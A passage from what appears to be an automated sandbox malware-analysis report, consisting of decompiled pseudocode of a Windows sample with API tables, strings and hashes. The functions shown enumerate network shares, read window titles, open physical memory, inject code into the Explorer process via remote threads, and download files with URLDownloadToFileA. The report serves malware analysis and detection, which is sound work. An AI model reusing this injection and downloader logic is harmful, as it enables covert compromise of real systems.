						E24013120( &_v44, 0x2402e8f8);
						_push( *_t296);
						_push(_v12);
						_push(0x2402e8d0);
						_push(_v16);
						_push(0x2402e8d0);
						asm("cdq");
						E240158BC( &_v140,  &_v40, 0x2402e8f8, _v24, 0x2402e8f8);
						_push(_v140);
						_push(0x2402e8d0);
						_push(_v32);
						_push(0x2402e8d0);
						_push(_v36);
						_push(0x2402e8d0);
						_push(_v44);
						_push(0x2402e8d0);
						asm("cdq");
						E240158BC( &_v144,  &_v40, 0x2402e8f8, _v48, 0x2402e8f8);
						_push(_v144);
						_push(0x2402e8d0);
						_push(_v40);
						_push(0x2402e8d0);
						_push(0x2402e904);
						E240133FC();
						_t289 = _t289 + 1;
						_t238 = _t238 - 1;
					} while (_t238 != 0);
				}
				_pop(_t254);
				 *[fs:eax] = _t254;
				_push(0x2402e8c0);
				E240130AC( &_v144, 2);
				E24013778( &_v136);
				E24013088( &_v132);
				E24013778( &_v128);
				E240130AC( &_v124, 3);
				E24013778( &_v112);
				E24013088( &_v108);
				E24013790( &_v104, 2);
				E24013088( &_v96);
				E24013778( &_v92);
				E24013088( &_v88);
				E240130AC( &_v44, 4);
				return E240130AC( &_v20, 3);
			}




















































                                    0x2402e4f9
                                    0x2402e4fb
                                    0x2402e500
                                    0x2402e500
                                    0x2402e502
                                    0x2402e504
                                    0x2402e504
                                    0x2402e507
                                    0x2402e50b
                                    0x2402e50d
                                    0x2402e512
                                    0x2402e513
                                    0x2402e518
                                    0x2402e51b
                                    0x2402e52a
                                    0x2402e539
                                    0x2402e543
                                    0x2402e547
                                    0x2402e54d
                                    0x2402e54e
                                    0x2402e550
                                    0x2402e567
                                    0x2402e567
                                    0x2402e569
                                    0x2402e56a
                                    0x2402e573
                                    0x2402e578
                                    0x2402e57c
                                    0x2402e59c
                                    0x2402e5a7
                                    0x2402e5b2
                                    0x2402e57e
                                    0x2402e584
                                    0x2402e58f
                                    0x2402e58f
                                    0x2402e5bf
                                    0x2402e5c2
                                    0x2402e5c6
                                    0x2402e5e6
                                    0x2402e5f1
                                    0x2402e5fc
                                    0x2402e5c8
                                    0x2402e5ce
                                    0x2402e5d9
                                    0x2402e5d9
                                    0x2402e609
                                    0x2402e60c
                                    0x2402e617
                                    0x2402e61f
                                    0x2402e626
                                    0x2402e631
                                    0x2402e636
                                    0x2402e63d
                                    0x2402e643
                                    0x2402e64a
                                    0x2402e64a
                                    0x2402e64f
                                    0x2402e651
                                    0x2402e654
                                    0x2402e659
                                    0x2402e65c
                                    0x2402e664
                                    0x2402e66a
                                    0x2402e66f
                                    0x2402e672
                                    0x2402e677
                                    0x2402e67a
                                    0x2402e682
                                    0x2402e688
                                    0x2402e68d
                                    0x2402e690
                                    0x2402e695
                                    0x2402e698
                                    0x2402e6a0
                                    0x2402e6a6
                                    0x2402e6ab
                                    0x2402e6ae
                                    0x2402e6b3
                                    0x2402e6b6
                                    0x2402e6bb
                                    0x2402e6c7
                                    0x2402e6cc
                                    0x2402e6cd
                                    0x2402e6cd
                                    0x2402e550
                                    0x2402e6d9
                                    0x2402e6dd
                                    0x2402e6e3
                                    0x2402e6e4
                                    0x2402e6e6
                                    0x2402e6e6
                                    0x2402e6e9
                                    0x2402e6f3
                                    0x2402e6fa
                                    0x2402e6fd
                                    0x2402e701
                                    0x2402e70c
                                    0x2402e711
                                    0x2402e715
                                    0x2402e738
                                    0x2402e746
                                    0x2402e751
                                    0x2402e717
                                    0x2402e71d
                                    0x2402e728
                                    0x2402e728
                                    0x2402e75e
                                    0x2402e769
                                    0x2402e776
                                    0x2402e786
                                    0x2402e78e
                                    0x2402e799
                                    0x2402e79e
                                    0x2402e7a0
                                    0x2402e7a3
                                    0x2402e7a8
                                    0x2402e7ab
                                    0x2402e7b3
                                    0x2402e7bc
                                    0x2402e7c1
                                    0x2402e7c7
                                    0x2402e7cc
                                    0x2402e7cf
                                    0x2402e7d4
                                    0x2402e7d7
                                    0x2402e7dc
                                    0x2402e7df
                                    0x2402e7e7
                                    0x2402e7f0
                                    0x2402e7f5
                                    0x2402e7fb
                                    0x2402e800
                                    0x2402e803
                                    0x2402e808
                                    0x2402e814
                                    0x2402e819
                                    0x2402e81a
                                    0x2402e81a
                                    0x2402e6e6
                                    0x2402e823
                                    0x2402e826
                                    0x2402e829
                                    0x2402e839
                                    0x2402e844
                                    0x2402e84c
                                    0x2402e854
                                    0x2402e861
                                    0x2402e869
                                    0x2402e871
                                    0x2402e87e
                                    0x2402e886
                                    0x2402e88e
                                    0x2402e896
                                    0x2402e8a3
                                    0x2402e8b5

                                    APIs
                                    • GetCurrentProcessId.KERNEL32(00000000,2402E8B6,?,?,?,?,00000010,00000000,00000000), ref: 2402E51E
                                      • Part of subcall function 2402DD70: WSAStartup.WS2_32(00000101,?), ref: 2402DDB0
                                      • Part of subcall function 2402DD70: inet_addr.WS2_32(00000000), ref: 2402DDCF
                                      • Part of subcall function 2402DD70: WSACleanup.WS2_32 ref: 2402DDDD
                                      • Part of subcall function 2402DD70: gethostbyaddr.WS2_32(000000FF,00000004,00000002), ref: 2402DDF1
                                      • Part of subcall function 2402DD70: WSACleanup.WS2_32 ref: 2402DE12
                                      • Part of subcall function 24013790: SysFreeString.OLEAUT32(?), ref: 240137A3
                                      • Part of subcall function 24013778: SysFreeString.OLEAUT32(?), ref: 24013786
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CleanupFreeString$CurrentProcessStartupgethostbyaddrinet_addr
                                    • String ID: TCP$UDP$Unknown
                                    • API String ID: 3668935989-2456960297
                                    • Opcode ID: e57e4693100bc3df1c1c744bc845f6993cdae99d8f2113ad77336bcd28f6d825
                                    • Instruction ID: 8ad574ea02d0bdfe3b501ab4681b3dc418f98a11658dae951fca0ffa6e31001a
                                    • Opcode Fuzzy Hash: e57e4693100bc3df1c1c744bc845f6993cdae99d8f2113ad77336bcd28f6d825
                                    • Instruction Fuzzy Hash: FAB1FB7094050DABEF11DBA4C880EDEBBBAFF54304F208565E548B7298DA70AE85CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240406F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142shareCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E240406F0(void* __eax, void* __ebx, intOrPtr* __ecx, struct _NETRESOURCE* __edx, void* __edi, void* __esi) {
				struct _NETRESOURCE* _v8;
				void* _v12;
				int _v16;
				int _v20;
				char _v16432;
				void _v16436;
				char _v16440;
				char _v16444;
				char _v16448;
				char _v16452;
				void* _t35;
				signed int _t51;
				signed int* _t72;
				intOrPtr _t80;
				intOrPtr _t83;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t97;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_push(__eax);
				_t35 = 4;
				do {
					_t100 = _t100 + 0xfffff004;
					_push(_t35);
					_t35 = _t35 - 1;
				} while (_t35 != 0);
				_t101 = _t100 + 0xffffffc4;
				_v16452 = 0;
				_v16448 = 0;
				_v16444 = 0;
				_v16440 = 0;
				_t93 = __ecx;
				_v8 = __edx;
				_push(_t99);
				_push(0x240408d9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101;
				E24013088(__ecx);
				if(WNetOpenEnumA(2, 0, 0, _v8,  &_v12) != 0) {
					__eflags = 0;
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(0x240408e0);
					return E240130AC( &_v16452, 4);
				} else {
					_push(_t99);
					_push(0x240408b4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t101;
					_v16 = 0xffffffff;
					_v20 = 0x4020;
					while(WNetEnumResourceA(_v12,  &_v16,  &_v16436,  &_v20) == 0) {
						_t96 = _v16 - 1;
						__eflags = _t96;
						if(_t96 >= 0) {
							_t97 = _t96 + 1;
							__eflags = _t97;
							_t72 =  &_v16432;
							do {
								_t51 = _v8 - 1;
								__eflags = _t51;
								if(__eflags < 0) {
									__eflags =  *_t72;
									if( *_t72 == 0) {
										_push( *_t93);
										E24013274( &_v16440, _t72[4]);
										_push(_v16440);
										_push(0x240408f0);
										_push(0x240408fc);
										_push(0x240408f0);
										E240133FC();
									}
								} else {
									if(__eflags == 0) {
										__eflags =  *_t72 - 1;
										if( *_t72 == 1) {
											_push( *_t93);
											E24013274( &_v16444, _t72[4]);
											_push(_v16444);
											_push(0x240408f0);
											_push(0x24040908);
											_push(0x240408f0);
											E240133FC();
										}
									} else {
										__eflags = _t51 == 1;
										if(_t51 == 1) {
											__eflags =  *_t72 - 2;
											if( *_t72 == 2) {
												_push( *_t93);
												E24013274( &_v16448, _t72[4]);
												_push(_v16448);
												_push(0x240408f0);
												_push(0x24040914);
												_push(0x240408f0);
												E240133FC();
											}
										}
									}
								}
								__eflags = _t72[2] & 0x00000002;
								if((_t72[2] & 0x00000002) > 0) {
									E240406F0(_t72 - 4, _t72,  &_v16452, 1, _t93, _t97);
									E24013344(_t93, _v16452);
								}
								_t72 =  &(_t72[8]);
								_t97 = _t97 - 1;
								__eflags = _t97;
							} while (_t97 != 0);
						}
					}
					_pop(_t83);
					 *[fs:eax] = _t83;
					_push(0x240408bb);
					return WNetCloseEnum(_v12);
				}
			}
























                                    0x240406f1
                                    0x240406f3
                                    0x240406f4
                                    0x240406f9
                                    0x240406f9
                                    0x240406ff
                                    0x24040700
                                    0x24040700
                                    0x24040706
                                    0x2404070e
                                    0x24040714
                                    0x2404071a
                                    0x24040720
                                    0x24040726
                                    0x24040728
                                    0x2404072f
                                    0x24040730
                                    0x24040735
                                    0x24040738
                                    0x2404073d
                                    0x24040754
                                    0x240408bb
                                    0x240408bd
                                    0x240408c0
                                    0x240408c3
                                    0x240408d8
                                    0x2404075a
                                    0x2404075c
                                    0x2404075d
                                    0x24040762
                                    0x24040765
                                    0x24040768
                                    0x2404076f
                                    0x2404087d
                                    0x2404077e
                                    0x2404077f
                                    0x24040781
                                    0x24040787
                                    0x24040787
                                    0x24040788
                                    0x2404078e
                                    0x24040791
                                    0x24040791
                                    0x24040794
                                    0x240407a0
                                    0x240407a3
                                    0x240407a9
                                    0x240407b4
                                    0x240407b9
                                    0x240407bf
                                    0x240407c4
                                    0x240407c9
                                    0x240407d5
                                    0x240407d5
                                    0x24040796
                                    0x24040796
                                    0x240407dc
                                    0x240407df
                                    0x240407e1
                                    0x240407ec
                                    0x240407f1
                                    0x240407f7
                                    0x240407fc
                                    0x24040801
                                    0x2404080d
                                    0x2404080d
                                    0x24040798
                                    0x24040798
                                    0x24040799
                                    0x24040814
                                    0x24040817
                                    0x24040819
                                    0x24040824
                                    0x24040829
                                    0x2404082f
                                    0x24040834
                                    0x24040839
                                    0x24040845
                                    0x24040845
                                    0x24040817
                                    0x24040799
                                    0x24040796
                                    0x2404084a
                                    0x24040851
                                    0x24040861
                                    0x2404086e
                                    0x2404086e
                                    0x24040873
                                    0x24040876
                                    0x24040876
                                    0x24040876
                                    0x2404078e
                                    0x24040781
                                    0x2404089f
                                    0x240408a2
                                    0x240408a5
                                    0x240408b3
                                    0x240408b3

                                    APIs
                                    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,?), ref: 2404074D
                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,00004020), ref: 24040890
                                    • WNetCloseEnum.MPR(?), ref: 240408AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$CloseOpenResource
                                    • String ID: @
                                    • API String ID: 1269649575-2726393805
                                    • Opcode ID: 1ce61c0284aa5572a2b3cb395a753048e69c820855dbf928b35c69ab33d4b85b
                                    • Instruction ID: c9663ee355b49cf1c2293fbe22f7a4e3f628249a96f0d81c6c22571bac840af8
                                    • Opcode Fuzzy Hash: 1ce61c0284aa5572a2b3cb395a753048e69c820855dbf928b35c69ab33d4b85b
                                    • Instruction Fuzzy Hash: 2E419EB1E00219AFEF119F55CD80F8ABBB9FB54324F1040B9EB48B7248D6749BC08E95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24042A48, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E24042A48(void* __ebx, struct HWND__* _a4) {
				char _v8;
				char _v12;
				char _v16;
				int _t19;
				int _t26;
				struct HWND__* _t40;
				void* _t43;
				intOrPtr _t48;
				intOrPtr _t56;

				_push(0);
				_push(0);
				_push(0);
				_t40 = _a4;
				_push(_t56);
				_push(0x24042b4d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56;
				if(_t40 != 0) {
					E240136BC( &_v8, 0xff);
					_t19 = E2401333C(_v8);
					E240136BC( &_v8, GetWindowTextA(_t40, E24013534(_v8), _t19));
					if(IsWindowVisible(_t40) == 0 || _v8 == 0) {
						_t26 = IsWindowVisible(_t40);
						asm("sbb eax, eax");
						if(_t26 + 1 == 0 && _v8 != 0) {
							_push( *0x240632e4);
							_push("*@*@");
							_push(_v8);
							_push(0x24042b68);
							E240158BC( &_v16, _t43, 0, _t40, 0);
							_push(_v16);
							_push(0x24042b68);
							E240133FC();
						}
					} else {
						_push( *0x240632e4);
						_push(_v8);
						_push(0x24042b68);
						E240158BC( &_v12, _t43, 0, _t40, 0);
						_push(_v12);
						_push(0x24042b68);
						E240133FC();
					}
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x24042b54);
				return E240130AC( &_v16, 3);
			}












                                    0x24042a4b
                                    0x24042a4d
                                    0x24042a4f
                                    0x24042a52
                                    0x24042a57
                                    0x24042a58
                                    0x24042a5d
                                    0x24042a60
                                    0x24042a65
                                    0x24042a76
                                    0x24042a7e
                                    0x24042a98
                                    0x24042aa5
                                    0x24042ae3
                                    0x24042aeb
                                    0x24042af0
                                    0x24042af8
                                    0x24042afe
                                    0x24042b03
                                    0x24042b06
                                    0x24042b14
                                    0x24042b19
                                    0x24042b1c
                                    0x24042b2b
                                    0x24042b2b
                                    0x24042aad
                                    0x24042aad
                                    0x24042ab3
                                    0x24042ab6
                                    0x24042ac4
                                    0x24042ac9
                                    0x24042acc
                                    0x24042adb
                                    0x24042adb
                                    0x24042b30
                                    0x24042b34
                                    0x24042b37
                                    0x24042b3a
                                    0x24042b4c

                                    APIs
                                    • GetWindowTextA.USER32(?,00000000,00000000), ref: 24042A8E
                                    • IsWindowVisible.USER32(?), ref: 24042A9E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$TextVisible
                                    • String ID: *@*@
                                    • API String ID: 1670992164-2280034366
                                    • Opcode ID: c45a5717a2f133e187bddf60decffecf5e201661517c01256e644db559c9fd8f
                                    • Instruction ID: 8a8c08a70dfa2e8decc0244ec7c24e2506ca714a89d2e5ccce12ab8d8d6c49c7
                                    • Opcode Fuzzy Hash: c45a5717a2f133e187bddf60decffecf5e201661517c01256e644db559c9fd8f
                                    • Instruction Fuzzy Hash: 35219D70B00205BBFF01DEA1CC90F9EB7ADEB68348F508079B905AA158DA75DFC4DA95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240536D0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E240536D0() {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v48;
				char _v60;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t30;
				void* _t32;
				long _t37;
				intOrPtr _t38;

				_t38 =  &_v32;
				0x24063704->dwOSVersionInfoSize = 0x94;
				GetVersionExA(0x24063704);
				if( *0x24063708 == 5) {
					__eflags =  *0x2406370c - 1;
					if(__eflags < 0) {
						_t37 = 0x30000;
						L8:
						 *0x2405aaac( &_v36, L"\\Device\\PhysicalMemory");
						_v36 = 0x18;
						_v32 = 0;
						_v28 = _t38;
						_v24 = 0;
						_v20 = 0;
						_v16 = 0;
						_t22 =  *0x2405aab0(0x2405aabc, 6,  &_v36);
						__eflags = _t22 - 0xc0000022;
						if(_t22 == 0xc0000022) {
							 *0x2405aab0(0x2405aabc, 0x60000,  &_v48);
							_t30 =  *0x2405aabc; // 0x0
							E240535C4(_t30);
							_t32 =  *0x2405aabc; // 0x0
							CloseHandle(_t32);
							_t22 =  *0x2405aab0(0x2405aabc, 6,  &_v60);
						}
						__eflags = _t22;
						if(_t22 >= 0) {
							_t23 =  *0x2405aabc; // 0x0
							 *0x2405aab8 = MapViewOfFile(_t23, 6, 0, _t37, 0x1000);
							__eflags =  *0x2405aab8;
							if( *0x2405aab8 != 0) {
								_t25 =  *0x2405aabc; // 0x0
								return _t25;
							}
							return 0;
						}
						return 0;
					}
					if(__eflags == 0) {
						_t37 = 0x39000;
						goto L8;
					}
					return 0;
				}
				return 0;
			}


















                                    0x240536d1
                                    0x240536d4
                                    0x240536e3
                                    0x240536ef
                                    0x240536fd
                                    0x24053700
                                    0x24053706
                                    0x2405371b
                                    0x24053725
                                    0x2405372b
                                    0x24053735
                                    0x2405373b
                                    0x24053741
                                    0x24053747
                                    0x2405374d
                                    0x2405375d
                                    0x24053763
                                    0x24053768
                                    0x24053779
                                    0x2405377f
                                    0x24053784
                                    0x24053789
                                    0x2405378f
                                    0x240537a0
                                    0x240537a0
                                    0x240537a6
                                    0x240537a8
                                    0x240537b8
                                    0x240537c3
                                    0x240537c8
                                    0x240537cf
                                    0x240537d5
                                    0x00000000
                                    0x240537d5
                                    0x00000000
                                    0x240537d1
                                    0x00000000
                                    0x240537aa
                                    0x24053702
                                    0x2405370d
                                    0x00000000
                                    0x2405370d
                                    0x00000000
                                    0x24053714
                                    0x00000000

                                    APIs
                                    • GetVersionExA.KERNEL32(24063704), ref: 240536E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Version
                                    • String ID: \Device\PhysicalMemory
                                    • API String ID: 1889659487-2007344781
                                    • Opcode ID: f9afce1440229dc77ddab007eb147b6a452be40f934abc042d2375c706e0e78f
                                    • Instruction ID: 31f08a68bebc2b102270513c3743b15cdca4706c229416923a06d65bcb2daa85
                                    • Opcode Fuzzy Hash: f9afce1440229dc77ddab007eb147b6a452be40f934abc042d2375c706e0e78f
                                    • Instruction Fuzzy Hash: 1C21E1B1A14209AFE361CF79C984F4A7AD9FB48244F104839F506D7664D7BCD5C88F62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403B3FC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E2403B3FC(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t49;
				void* _t55;

				_v20 = 0;
				_v16 = 0;
				_push(_t55);
				_push(0x2403b4ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffff0;
				E240115E0(0,  &_v16);
				_t52 = E24013534(_v16);
				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
				_t37 = OpenProcess(0x1f0fff, 0, _v8);
				E24013274( &_v20, _t17);
				_v12 = E2403B308(_t22, E2401333C(_v20), _t52);
				E2403B354(_t37, E2403B308(_t37, 4,  &_v12), E2403B2E0);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x2403b4b5);
				return E240130AC( &_v20, 2);
			}









                                    0x2403b406
                                    0x2403b409
                                    0x2403b40e
                                    0x2403b40f
                                    0x2403b414
                                    0x2403b417
                                    0x2403b41f
                                    0x2403b42c
                                    0x2403b43f
                                    0x2403b454
                                    0x2403b45b
                                    0x2403b473
                                    0x2403b48e
                                    0x2403b495
                                    0x2403b498
                                    0x2403b49b
                                    0x2403b4ad

                                    APIs
                                      • Part of subcall function 240115E0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,2405B97C,24054C34,00000000,24054C9D,?,?,00000000,00000000), ref: 24011604
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 2403B439
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 2403B43F
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,2403B4AE), ref: 2403B44F
                                      • Part of subcall function 2403B308: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 2403B320
                                      • Part of subcall function 2403B308: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 2403B331
                                      • Part of subcall function 2403B308: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 2403B33F
                                      • Part of subcall function 2403B354: GetModuleHandleA.KERNEL32(00000000), ref: 2403B36C
                                      • Part of subcall function 2403B354: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 2403B396
                                      • Part of subcall function 2403B354: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3A5
                                      • Part of subcall function 2403B354: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 2403B3B8
                                      • Part of subcall function 2403B354: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3C0
                                      • Part of subcall function 2403B354: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 2403B3E1
                                      • Part of subcall function 2403B354: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 2403B3E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: 393fb5f8634584fb9e86427e0323e598e0b3ec1d2f89986c1015fb721856fc72
                                    • Instruction ID: 6bf5e75614952cd0dc9ca3c9003167bd2cfedf8609bd1293714aecec320920e0
                                    • Opcode Fuzzy Hash: 393fb5f8634584fb9e86427e0323e598e0b3ec1d2f89986c1015fb721856fc72
                                    • Instruction Fuzzy Hash: 6611C671B00218AFEB01EBB4CC90BAEBBF8EF49208F504575E515E7349EA74DE408B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240161A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 52%
                                    			E240161A0(char __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				_Unknown_base(*)()* _t12;
				void* _t18;
				intOrPtr _t27;
				void* _t29;
				void* _t30;
				intOrPtr _t32;

				_t29 = __ecx;
				_t18 = __edx;
				_v8 = __eax;
				E24014A8C(_v8);
				 *[fs:eax] = _t32;
				_t12 = GetProcAddress(LoadLibraryA("urlmon.dll"), "URLDownloadToFileA");
				 *_t12(_v8, _t18, _t29, _a8, _a4,  *[fs:eax], 0x24016200, _t32, __esi, __ebx, __ecx, _t30);
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E24016207);
				return E24014A48( &_v8);
			}










                                    0x240161a6
                                    0x240161a8
                                    0x240161aa
                                    0x240161b0
                                    0x240161c0
                                    0x240161d3
                                    0x240161e6
                                    0x240161ec
                                    0x240161ef
                                    0x240161f2
                                    0x240161ff

                                    APIs
                                    • LoadLibraryA.KERNEL32(urlmon.dll,URLDownloadToFileA,00000000,24016200,?,?,?,00000000,?,2403862A,00000000,00000000,00000000,2403867F,?,.tmp), ref: 240161CD
                                    • GetProcAddress.KERNEL32(00000000,urlmon.dll), ref: 240161D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: URLDownloadToFileA$urlmon.dll
                                    • API String ID: 2574300362-892269089
                                    • Opcode ID: e4c6e49eb9fafcdb7affa66ae8e8a6dde4751a6dc5894be42a4bb0265b42decb
                                    • Instruction ID: e07162667821156883db5b363881209dab75b607400cc71d2c787b667578c6eb
                                    • Opcode Fuzzy Hash: e4c6e49eb9fafcdb7affa66ae8e8a6dde4751a6dc5894be42a4bb0265b42decb
                                    • Instruction Fuzzy Hash: 78F09075604A04BFA701CBE6CC90D5E7BECEF8D6103918869F40CD3214D634AF408AA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24020B6C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24020B6C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v40;
				char _v44;
				void* _t19;
				intOrPtr _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t31;

				_t19 = __eax;
				_t23 =  *0x2401f830; // 0x2401f834
				E240139CC( &_v44, _t23);
				_push(_t31);
				_push(0x24020bd9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t31 + 0xffffffd8;
				 *0x24057124 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "GetProductInfo");
				E2401F870( &_v44, _t19, __edi, __esi);
				E240130DC(_t19, _v40);
				_pop(_t25);
				 *[fs:eax] = _t25;
				_push(0x24020be0);
				_t26 =  *0x2401f830; // 0x2401f834
				return E24013A90( &_v44, _t26);
			}










                                    0x24020b73
                                    0x24020b78
                                    0x24020b7e
                                    0x24020b85
                                    0x24020b86
                                    0x24020b8b
                                    0x24020b8e
                                    0x24020ba6
                                    0x24020bae
                                    0x24020bb8
                                    0x24020bbf
                                    0x24020bc2
                                    0x24020bc5
                                    0x24020bcd
                                    0x24020bd8

                                    APIs
                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,GetProductInfo,00000000,24020BD9), ref: 24020B9B
                                    • GetProcAddress.KERNEL32(00000000,KERNEL32.DLL), ref: 24020BA1
                                      • Part of subcall function 2401F870: GetVersionExW.KERNEL32(0000011C), ref: 2401F8DA
                                      • Part of subcall function 2401F870: GetVersionExW.KERNEL32(00000094,0000011C), ref: 2401F8F6
                                      • Part of subcall function 2401F870: GetSystemInfo.KERNEL32(?,0000011C), ref: 2401F95C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                    • String ID: GetProductInfo$KERNEL32.DLL
                                    • API String ID: 335284197-4189171773
                                    • Opcode ID: 4778341dd39cdc0ca0d4e746f4429cd8b0c515a30ad8d89b6d42cbe363fdf21c
                                    • Instruction ID: aa62a680170db7b19b039549c83a77f4792b4161eecb6727310b407adea659c8
                                    • Opcode Fuzzy Hash: 4778341dd39cdc0ca0d4e746f4429cd8b0c515a30ad8d89b6d42cbe363fdf21c
                                    • Instruction Fuzzy Hash: A5F096356146045FEB12DFA5CCA0D8E77E8FB596187900131E809B369CDA34ADC18EA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24021904, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24021904(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				_Unknown_base(*)()* _t5;
				void* _t7;
				void* _t12;
				void* _t13;

				_t12 = __ecx;
				_t13 = __edx;
				_t7 = __eax;
